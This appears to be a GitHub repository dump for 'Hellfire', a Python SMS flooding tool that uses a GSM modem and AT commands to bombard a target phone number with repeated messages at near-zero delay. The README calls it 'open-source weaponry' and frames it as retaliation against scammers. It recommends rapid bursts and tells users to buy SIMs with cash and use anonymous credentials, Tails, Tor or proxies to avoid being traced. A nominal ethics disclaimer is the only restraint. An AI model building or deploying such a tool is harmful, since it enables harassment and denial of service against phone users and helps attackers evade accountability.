├── LICENSE ├── hellfire_gsm.py └── README.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 ekomsSavior 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /hellfire_gsm.py: -------------------------------------------------------------------------------- 1 | import serial 2 | import time 3 | 4 | def print_banner(): 5 | print(r""" 6 | _ _ _ _ _ _ _ _ 7 | / \ / \ / \ / \ / \ / \ / \ / \ 8 | ( H | E | L | L | F | I | R | E ) 9 | \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ 10 | by ek0ms savi0r 11 | """) 12 | 13 | def find_port(): 14 | return "/dev/ttyUSB0" 15 | 16 | def send_sms(port, number, message, count, delay): 17 | try: 18 | print(f"\n[+] Connecting to GSM modem on {port}...") 19 | ser = serial.Serial(port, baudrate=9600, timeout=5) 20 | time.sleep(2) 21 | 22 | # Initialize modem 23 | ser.write(b'AT\r') 24 | time.sleep(1) 25 | ser.write(b'AT+CMGF=1\r') 26 | time.sleep(1) 27 | 28 | for i in range(count): 29 | full_message = f"{message} #{i+1}" 30 | print(f"[{i+1}/{count}] {full_message}") 31 | ser.write(f'AT+CMGS="{number}"\r'.encode()) 32 | time.sleep(0.25) # Bare minimum for modem to accept number 33 | ser.write(full_message.encode() + b"\x1A") 34 | time.sleep(delay) 35 | 36 | ser.close() 37 | print("\n[✔] All messages sent successfully. Hellfire operation complete.") 38 | 39 | except Exception as e: 40 | print(f"\n[!] Error: {e}") 41 | 42 | if __name__ == "__main__": 43 | print_banner() 44 | port = find_port() 45 | 46 | number = input("Enter target phone number (e.g. +1234567890): ") 47 | message = input("Enter SMS message content: ") 48 | 49 | try: 50 | count = int(input("How many times to send it? ")) 51 | delay = float(input("Delay between messages (in seconds, can be decimal): ")) 52 | except ValueError: 53 | print("[!] Invalid input. Exiting.") 54 | exit() 55 | 56 | send_sms(port, number, message, count, delay) 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ( H | E | L | L | F | I | R | E ) 2 | 3 | open-source weaponry 4 | 5 | _by ek0ms savi0r_ 6 | 7 | ![hellfire](https://github.com/user-attachments/assets/6b036330-ca42-4f47-b38c-116390887824) 8 | 9 | ## What is Hellfire? 10 | 11 | **Hellfire** is a real-world SMS flooding tool built for cybersecurity research, counter-scamming, and hacker education. 12 | It uses your own SIM card and GSM modem — not Twilio, not Nexmo, and **no third-party nonsense**. 13 | If a scammer hits your phone, **this is what hits back**. 14 | 15 | Use cases 16 | 17 | - SMS alert stress-testing 18 | 19 | - Ethical counter-scamming 20 | 21 | - OSINT and reply honeypots 22 | 23 | - Spoof detection research (coming soon) 24 | 25 | --- 26 | 27 | ## 🛠 What You’ll Need 28 | 29 | - **SIM800C USB GSM Modem** 30 | 31 | Plug-and-play USB dongle with antenna. 32 | 33 | [Amazon link](https://a.co/d/cWa05mU) or search: `SIM800C GSM USB dongle` 34 | 35 | - **Prepaid M2M / IoT SIM Card (REQUIRED — standard phone SIMs often fail!)** 36 | → These are designed for modems and work reliably: 37 | 38 | • Hologram.io Global IoT SIM 39 | • 1NCE IoT SIM 40 | • Things Mobile SIM 41 | • Air Global Plan01s IoT SIM (Amazon) 42 | 43 | → Must support **outgoing SMS** (not just data) 44 | → Activate SIM at provider site 45 | → **Wait up to 24 hours after activation** for SMS to work 46 | → Format numbers like: `+1XXXXXXXXXX` 47 | 48 | - **Kali Linux or any Debian-based distro** 49 | 50 | - Just clone and run it 51 | 52 | - your SIM800C USB will be auto detected by kali if that is your host os. 53 | 54 | - if you are running a vm you have to attach the sim800c usb to the vm in > settings> USB> + ... before you start your vm. 55 | 56 | --- 57 | 58 | ## Installation & Execution 59 | 60 | git clone https://github.com/ekomsSavior/HELLFIRE.git 61 | 62 | cd HELLFIRE 63 | 64 | - Activate your sim card 65 | 66 | ( buy it with cash and use a prepaid giftcard and anonymous creds to remain anonymous also use tails, tor and or proxies) 67 | 68 | Insert your SIM card into the GSM dongle, then plug it in via USB. 69 | 70 | Run Hellfire 71 | 72 | sudo python3 hellfire_gsm.py 73 | 74 | Example Run 75 | 76 | Enter target phone number (e.g. +1234567890): +13332224444 77 | Enter SMS message content: HACK THE PLANET 78 | How many times to send it? 100 79 | Delay between messages (in seconds, can be decimal): 0.001 80 | 81 | [1/10] HACK THE PLANET #1 82 | [2/10] HACK THE PLANET #2 83 | ... 84 | [✔] All messages sent successfully. Hellfire operation complete. 85 | 86 | ![FOURTYONE](https://github.com/user-attachments/assets/ec9febfb-3481-456d-bfe2-4d44869f8b95) 87 | 88 | 89 | Tips for Success- 90 | 91 | Use full number format (+1...) 92 | 93 | Use short delays (e.g. 0.05) for rapid bursts 94 | 95 | 96 | 🛡 Disclaimer 97 | 98 | This tool is for ethical cybersecurity research only. 99 | 100 | By using Hellfire, you agree to- 101 | 102 | Only target systems and numbers you control or have permission to test. 103 | 104 | the user assumes full responsibility of thier actions when using HELLFIRE choose your path wisely. 105 | 106 | 107 | **Coming Soon** 108 | 109 | SMS origin tracing 110 | 111 | Honeypot reply traps 112 | 113 | Scam message fingerprinting 114 | 115 | Integration with Phish Hunter and Info Glow 116 | 117 | Made with light and love by 118 | ek0ms savi0r 119 | 120 | https://github.com/ekomsSavior 121 | 122 | https://instagram.com/ekoms.is.my.savior 123 | 124 | https://medium.com/@ekoms1 125 | 126 | --------------------------------------------------------------------------------